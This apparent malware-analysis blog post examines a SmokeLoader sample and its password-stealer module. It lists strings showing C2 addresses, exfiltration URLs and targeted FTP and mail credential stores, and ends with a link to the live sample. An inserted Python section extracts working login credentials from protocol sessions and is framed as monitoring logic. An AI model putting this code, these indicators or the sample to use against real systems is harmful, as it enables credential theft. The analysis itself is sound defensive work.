Thanks to my friend Raul, today I bring you this SmokeLoader sample, which is being distributed as a fake Amazon.com purchase order.
VirusTotal analysis:
Outer layer: a basic Visual Basic crypter.
With the crypter removed:
Interesting strings:
001E126C ASCII "&file=",0
001E1274 ASCII "&run=ok",0
001E127C ASCII "&run=fail",0
001E1288 ASCII "&sel=",0
001E1290 ASCII "&ver=",0
001E1298 ASCII "&bits=",0
001E12A0 ASCII "&doubles=1",0
001E12AC ASCII "&personal=ok",0
001E12BC ASCII "&removed=ok",0
001E12C8 ASCII "&admin=",0
001E12D0 ASCII "&hash=",0
001E12D8 ASCII "&r=",0
001E12DC ASCII "Software",0
001E2798 ASCII "svchost.exe",0
001E2AB6 PUSH Smoke.001E2E3C ASCII "Shell_TrayWnd"
001E2C03 PUSH Smoke.001E2E4C ASCII "s2k14"
001E2C69 PUSH Smoke.001E2E4C ASCII "s2k14"
001E2D36 PUSH Smoke.001E2E54 ASCII "svchost.exe"
001E2E86 PUSH 0x10000 UNICODE "=::=::\"
001E35E2 PUSH Smoke.001E3A14 ASCII "System"
001E38CC PUSH Smoke.001E3A1C ASCII "advapi32.dll"
001E38DC PUSH Smoke.001E3A1C ASCII "advapi32.dll"
001E39A8 PUSH Smoke.001E3A1C ASCII "advapi32.dll"
001E3A14 ASCII "System",0
001E3A1C ASCII "advapi32.dll",0
001E3A5D MOV EDX,Smoke.001E3D90 ASCII "Location:"
001E3D90 ASCII "Location:",0
001E3E1F MOV EDX,Smoke.001E424C ASCII "Smk"
001E3E5E MOV EDX,Smoke.001E4250 ASCII "plugin_size"
001E3E9C MOV EDX,Smoke.001E425C ASCII "|:|"
001E3EED PUSH 0xFA000 UNICODE "september"
001E3FBB PUSH Smoke.001E4260 ASCII "advapi32.dll"
001E3FCB PUSH Smoke.001E4260 ASCII "advapi32.dll"
001E4019 PUSH Smoke.001E4270 ASCII "%s%s%c"
001E4084 PUSH Smoke.001E4278 ASCII "%s%s"
001E4137 PUSH Smoke.001E4278 ASCII "%s%s"
001E41C0 PUSH Smoke.001E4280 ASCII "%s%s%d"
001E424C ASCII "Smk",0
001E4478 ASCII "%s%s%s%s%s",0
001E4586 MOV EDX,Smoke.001E45E4 ASCII "Work"
001E45E4 ASCII "Work",0
001E464A PUSH 0xFA000 UNICODE "september"
001E4792 PUSH Smoke.001E4858 ASCII "FF"
001E479C PUSH Smoke.001E485C ASCII "%s%s"
001E47E5 PUSH Smoke.001E4864 ASCII "%s%s%s"
001E4858 ASCII "FF",0
001E485C ASCII "%s%s",0
001E4864 ASCII "%s%s%s",0
001E489F MOV EDX,Smoke.001E49E4 ASCII "sample"
001E48CC PUSH Smoke.001E49EC ASCII "C:\"
001E4919 PUSH Smoke.001E49F0 ASCII "System\CurrentControlSet\Services\Disk\Enum"
001E5088 DD Smoke.001E1024 UNICODE "%s\%s"
001E508C DD Smoke.001E1030 UNICODE "%s%s"
001E5090 DD Smoke.001E103C UNICODE "regsvr32 /s %s"
001E5094 DD Smoke.001E105C UNICODE "%s\%s.lnk"
001E5098 DD Smoke.001E1070 UNICODE "%APPDATA%"
001E509C DD Smoke.001E1084 UNICODE "%TEMP%"
001E50A0 DD Smoke.001E1094 UNICODE ".exe"
001E50A4 DD Smoke.001E10A0 UNICODE ".dll"
001E50A8 DD Smoke.001E10AC UNICODE "/c start %s && exit"
001E50AC DD Smoke.001E10D4 ASCII "user32"
001E50B0 DD Smoke.001E10DC ASCII "shell32"
001E50B4 DD Smoke.001E10E4 ASCII "advapi32"
001E50B8 DD Smoke.001E10F0 ASCII "crypt32"
001E50BC DD Smoke.001E10F8 ASCII "ws2_32"
001E50C0 DD Smoke.001E1100 ASCII "urlmon"
001E50C4 DD Smoke.001E1108 ASCII "ole32"
001E50C8 DD Smoke.001E1110 ASCII "HelpLink"
001E50CC DD Smoke.001E111C ASCII "URLInfoAbout"
001E50D0 DD Smoke.001E112C ASCII "sbiedll"
001E50D4 DD Smoke.001E1134 ASCII "dbghelp"
001E50D8 DD Smoke.001E113C ASCII "qemu"
001E50DC DD Smoke.001E1144 ASCII "virtual"
001E50E0 DD Smoke.001E114C ASCII "vmware"
001E50E4 DD Smoke.001E1154 ASCII "xen"
001E50E8 DD Smoke.001E1158 ASCII ":Zone.Identifier"
001E50EC DD Smoke.001E116C ASCII "Mozilla/4.0"
001E50F0 DD Smoke.001E1178 ASCII "cmd=getload&login="
001E50F4 DD Smoke.001E118C ASCII "http://www.msn.com/"
001E50F8 DD Smoke.001E11A0 ASCII "GET /%s HTTP/1.1
This threat injects itself into an svchost.exe process:
001E2798 ASCII "svchost.exe",0
It checks for virtual machine artifacts before running (anti-VM); the sbiedll and dbghelp strings in the dump above point to Sandboxie and debugger checks as well:
001E50D8 DD Smoke.001E113C ASCII "qemu"
001E50DC DD Smoke.001E1144 ASCII "virtual"
001E50E0 DD Smoke.001E114C ASCII "vmware"
001E50E4 DD Smoke.001E1154 ASCII "xen"
Report to the C&C:
"cmd=getload&login="
In the dynamic test, the bot downloads a second executable module that steals sensitive information from the victim (a password stealer).
VirusTotal analysis:
It has no obfuscation layer.
Strings:
ASCII "===="
ASCII "software\microsoft\windows\currentversion"
ASCII "VendorId"
ASCII "rpcrt4.dll"
ASCII "UuidCreate"
ASCII "software\microsoft\windows\currentversion"
ASCII "VendorId"
ASCII "GetProcAddress"
UNICODE "=::=::\"
ASCII "Mozilla 4.0"
ASCII "Accept: text/html,application/xhtml+xml,applicati
ASCII "gzip"
ASCII "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.
ASCII "93.113.37.210"
ASCII "http://%s"
ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
ASCII "regedit32"
ASCII "93.113.37.210"
ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Pa
ASCII "%s:*:Enabled:Microsoft Office"
ASCII "5629186B-0207-4659-AE5D-B09282932A86"
ASCII "%s_%d"
ASCII "%s_%d"
ASCII "0123456789ABCDEFabcdef"
ASCII "0123456789ABCDEFabcdef"
ASCII "0123456789ABCDEFabcdef"
ASCII "0123456789ABCDEFabcdef"
ASCII "\..\Local\VirtualStore"
ASCII "\*.*"
UNICODE "text"
UNICODE "gzip"
ASCII "HTTP/1.1"
ASCII "Content-Encoding: gzip"
ASCII "Content-Length:"
ASCII "Transfer-Encoding: chunked"
ASCII "93.113.37.210"
UNICODE "=::=::\"
ASCII "bhappyland.com"
ASCII "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
ASCII "index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ft
ASCII "SUCCESS"
UNICODE "=::=::\"
ASCII "93.113.37.210"
ASCII "%08X-%04X-%04X-%02X%02X%02X%02X%02X%02X%02X%02X"
ASCII "93.113.37.210"
UNICODE "=::=::\"
ASCII "93.113.37.210"
ASCII "===="
ASCII "WABOpen"
UNICODE "::=::\"
ASCII "Software\Microsoft\WAB\DLLPath"
ASCII "Identities"
ASCII "Identities"
ASCII "Microsoft\Outlook Express"
ASCII "*.dbx"
UNICODE "::=::\"
ASCII "SOFTWARE\Clients\Mail"
ASCII "Microsoft Outlook"
ASCII "Microsoft Outlook"
ASCII "SOFTWARE\Clients\Mail\Microsoft Outlook"
ASCII ".."
ASCII "MSWQ*.tmp"
ASCII "MSWQ*.tmp"
ASCII ".rar"
ASCII ".zip"
ASCII ".cab"
ASCII ".avi"
ASCII ".mp3"
ASCII ".jpg"
ASCII ".gif"
ASCII "10"
ASCII "11"
ASCII "12"
ASCII "13"
ASCII "14"
ASCII "%s:%s:%s:%s"
ASCII "Config Path"
ASCII "Software\VanDyke\SecureFX"
ASCII "\Sessions"
ASCII "\*.ini"
ASCII "\*.*"
ASCII "Username"
ASCII "Hostname"
ASCII "Password"
ASCII "Software\FTPWare\CoreFTP\Sites"
ASCII "PW"
ASCII "User"
ASCII "Host"
ASCII "hdfzpysvpzimorhk"
ASCII "DataFolder"
ASCII "Software\FTPRush"
ASCII "RushSite.xml"
ASCII "Software\UltraFXP"
ASCII "Sites.xml"
ASCII "USER"
ASCII "HOST"
ASCII "PASS"
ASCII "Estsoft\ALFTP\ESTdb2.dat"
ASCII "Encrypt_PW"
ASCII "ID"
ASCII "URL"
ASCII "Software\Microsoft\Windows\CurrentVersion\Uninsta
ASCII "FTP Commander"
ASCII "FTP Navigator"
ASCII "InstallLocation"
ASCII "UninstallString"
ASCII "Ftplist.txt"
ASCII "User"
ASCII "Server"
ASCII "Password"
ASCII "Software\CoffeeCup Software\Internet\Profiles"
ASCII "Password"
ASCII "HostName"
ASCII "Username"
ASCII "%s\TurboFTP\addrbk.dat"
ASCII "%s:%s:%s:%s"
ASCII "%s:%s:%s:%s:%d"
ASCII "%s\SmartFTP\Client 2.0\Favorites"
ASCII "%s\*.xml"
ASCII "%s\%s"
ASCII "%s\*.*"
ASCII ".."
ASCII "%s\%s"
ASCII "%s:%s:%s:%s"
ASCII "%s:%s:%s:%s:%s"
ASCII "host"
ASCII "uid"
ASCII "pwd"
ASCII "software\ipswitch\ws_ftp"
ASCII "DataDir"
ASCII "%s\sites\ws_ftp.ini"
ASCII "wcx_ftp.ini"
ASCII "GHISLER"
ASCII "wcx_ftp.ini"
ASCII "Software\Ghisler"
ASCII "FtpIniName"
ASCII "Install_Dir"
ASCII "wcx_ftp.ini"
ASCII "InstallDir"
ASCII "wcx_ftp.ini"
ASCII "%d"
ASCII "connections"
ASCII "host"
ASCII "username"
ASCII "password"
ASCII "anonymous"
ASCII "e-mail"
ASCII "general"
ASCII "://"
ASCII "MS IE FTP Passwords"
ASCII "MS IE FTP Passwords"
ASCII "DPAPI: "
ASCII "acheCredentials"
ASCII "WininetCacheCredentials"
ASCII "pstorec.dll"
ASCII "crypt32.dll"
ASCII "PStoreCreateInstance"
ASCII "CryptUnprotectData"
ASCII "User"
ASCII "Host"
ASCII "Pass"
ASCII "Install_Dir"
ASCII "Software\FileZilla"
ASCII "FileZilla.xml"
ASCII "Server "
ASCII "Site "
ASCII "User"
ASCII "Host"
ASCII "Pass"
ASCII "Software\FileZilla"
ASCII "Last Server Pass"
ASCII "Last Server User"
ASCII "Last Server Host"
ASCII "Software\FileZilla\Site Manager"
ASCII "Pass"
ASCII "User"
ASCII "Host"
ASCII "\GlobalSCAPE"
ASCII "sm.*"
ASCII "8."
ASCII "Software\GlobalSCAPE\"
ASCII "Software\GlobalSCAPE\"
ASCII "\QCToolbar"
ASCII "QCHistory"
ASCII "%s\%s"
ASCII "HostName"
ASCII "User"
ASCII "Password"
ASCII "software\far\plugins\ftp\hosts"
ASCII "software\far2\plugins\ftp\hosts"
ASCII "Win32StopOffMutant"
ASCII "Win32StopOffMutant"
UNICODE "::\"
UNICODE "::\"
UNICODE "=::\"
UNICODE ":\"
UNICODE "=::=::\"
UNICODE "=::=::\"
ASCII "AUTH PLAIN"
ASCII "235"
ASCII "USER"
ASCII "PASS"
ASCII "230"
ASCII "USER"
ASCII "PASS"
ASCII "OK"
ASCII "LOGIN "
ASCII "%d.%d.%d.%d:%s:%s"
ASCII "%d:%s:%s:%d.%d.%d.%d"
ASCII "MAIL FROM:"
UNICODE ":=::\"
ASCII "RCPT TO:"
ASCII "NtQueryInformationProcess"
ASCII "ntdll"
ASCII "AllocateAndGetTcpExTableFromStack"
ASCII "iphlpapi.dll"
ASCII "AllocateAndGetUdpExTableFromStack"
ASCII "iphlpapi.dll"
ASCII "CreateToolhelp32Snapshot"
ASCII "kernel32.dll"
ASCII "Process32First"
ASCII "kernel32.dll"
ASCII "Process32Next"
ASCII "kernel32.dll"
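The tail of that list (`AUTH PLAIN`, `235`, `USER`, `PASS`, `230`, `OK`, `LOGIN `, `MAIL FROM:`, `RCPT TO:`), together with the `%d.%d.%d.%d:%s:%s` format and the iphlpapi/Toolhelp imports, suggests the module also watches live FTP, SMTP, POP3 and IMAP sessions and records `ip:user:password` once the server confirms the login. As an added example (not the bot's code and not the author's), the Python below implements that parsing over constructed transcripts; it is the same logic a network monitor runs to alert on cleartext logins. The protocol-to-reply mapping is my reading of those strings, and the TEST-NET-3 addresses, sessions and credentials are made up for the example.

```python
"""Added example (not the bot's code and not the author's): the credential
parsing that the AUTH PLAIN / 235 / USER / PASS / 230 / +OK / LOGIN strings
above imply, run over constructed session transcripts. The same logic is what
a network monitor uses to alert on cleartext logins. Sessions, addresses
(TEST-NET-3) and credentials below are made up for the example."""
import base64
from typing import List, Optional, Sequence, Tuple

# (server_ip, protocol, user, password): the bot's "%d.%d.%d.%d:%s:%s" record.
Record = Tuple[str, str, str, str]
Exchange = Sequence[Tuple[str, str]]   # ("C"|"S", line) in wire order


def _auth_plain(payload: str) -> Optional[Tuple[str, str]]:
    """SASL PLAIN: base64('authzid\\0authcid\\0password'); authcid is the login."""
    try:
        parts = base64.b64decode(payload, validate=True).split(b"\x00")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if len(parts) != 3:
        return None
    return parts[1].decode("utf-8", "replace"), parts[2].decode("utf-8", "replace")


def _login_ok(proto: str, line: str, imap_tag: Optional[str]) -> bool:
    """Server verdict on the pending login, per protocol."""
    if proto == "FTP":
        return line.startswith("230")      # "230 User logged in"
    if proto == "SMTP":
        return line.startswith("235")      # "235 Authentication successful"
    if proto == "POP3":
        return line.startswith("+OK")
    if proto == "IMAP":
        return imap_tag is not None and line.startswith(imap_tag + " OK")
    return False


def extract_credentials(server_ip: str, proto: str, exchange: Exchange) -> List[Record]:
    """Record a login only after the server confirms it; failed attempts are dropped."""
    proto = proto.upper()
    user = password = imap_tag = None
    awaiting_plain = False                 # "AUTH PLAIN" with the payload on the next line
    records: List[Record] = []
    for who, raw in exchange:
        line = raw.rstrip("\r\n")
        if who == "C":
            if proto == "IMAP":
                tag, _, rest = line.partition(" ")
                verb, _, arg = rest.partition(" ")
                if verb.upper() == "LOGIN":  # "a1 LOGIN user pass"
                    imap_tag = tag
                    user, _, password = arg.partition(" ")
                continue
            if awaiting_plain:
                awaiting_plain = False
                creds = _auth_plain(line)
                if creds:
                    user, password = creds
                continue
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user, password = arg, None
            elif verb == "PASS":
                password = arg
            elif verb == "AUTH" and arg.upper().startswith("PLAIN"):
                payload = arg[5:].strip()
                if payload:
                    creds = _auth_plain(payload)
                    if creds:
                        user, password = creds
                else:
                    awaiting_plain = True
        elif user is not None and password is not None:
            # Both halves seen: the next server line is the verdict.
            if _login_ok(proto, line, imap_tag):
                records.append((server_ip, proto, user, password))
            user = password = imap_tag = None
    return records


def format_record(rec: Record) -> str:
    """The ip:user:password layout of the "%d.%d.%d.%d:%s:%s" string."""
    ip, _, user, password = rec
    return f"{ip}:{user}:{password}"


def harvest(sessions: Sequence[Tuple[str, str, Exchange]]) -> List[Record]:
    out: List[Record] = []
    for ip, proto, exchange in sessions:
        out.extend(extract_credentials(ip, proto, exchange))
    return out


# Constructed transcripts (not real traffic); the POP3 one is a failed login.
_PLAIN = base64.b64encode(b"\x00bob@example.com\x00hunter2").decode()
SAMPLE_SESSIONS = [
    ("203.0.113.10", "FTP", [("S", "220 ftp ready"), ("C", "USER alice"),
                             ("S", "331 Password required"), ("C", "PASS s3cret"),
                             ("S", "230 User alice logged in")]),
    ("203.0.113.25", "SMTP", [("S", "220 mail ESMTP"), ("C", "EHLO host"),
                              ("S", "250 AUTH PLAIN LOGIN"), ("C", "AUTH PLAIN " + _PLAIN),
                              ("S", "235 2.7.0 Authentication successful")]),
    ("203.0.113.110", "POP3", [("S", "+OK POP3 ready"), ("C", "USER carol"), ("S", "+OK"),
                               ("C", "PASS wrong"), ("S", "-ERR [AUTH] Authentication failed")]),
    ("203.0.113.143", "IMAP", [("S", "* OK IMAP4rev1 ready"), ("C", "a1 LOGIN dave letmein"),
                               ("S", "a1 OK LOGIN completed")]),
]

if __name__ == "__main__":
    for rec in harvest(SAMPLE_SESSIONS):
        print(format_record(rec))
```

Run as a script it prints three records; the POP3 session yields nothing because the server answered `-ERR`, which is the check that separates a working credential from a guess and explains why the stealer carries the reply codes `230`, `235` and `OK` alongside the commands. `AUTH LOGIN` (base64 user and password on separate lines) is not handled here.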
C&C console:
Russian-language readme for the bot, found on the server.
An interesting write-up on this bot: http://www.webroot.com/blog/2012/02/03/a-peek-inside-the-smoke-malware-loader/
Sample:
https://mega.co.nz/#!9A1z2YpY!360jF2N2FbUFuss5vvNIDS-lX07nugOomLckduSPN7E
That's all for now.
@Dkavalanche 2014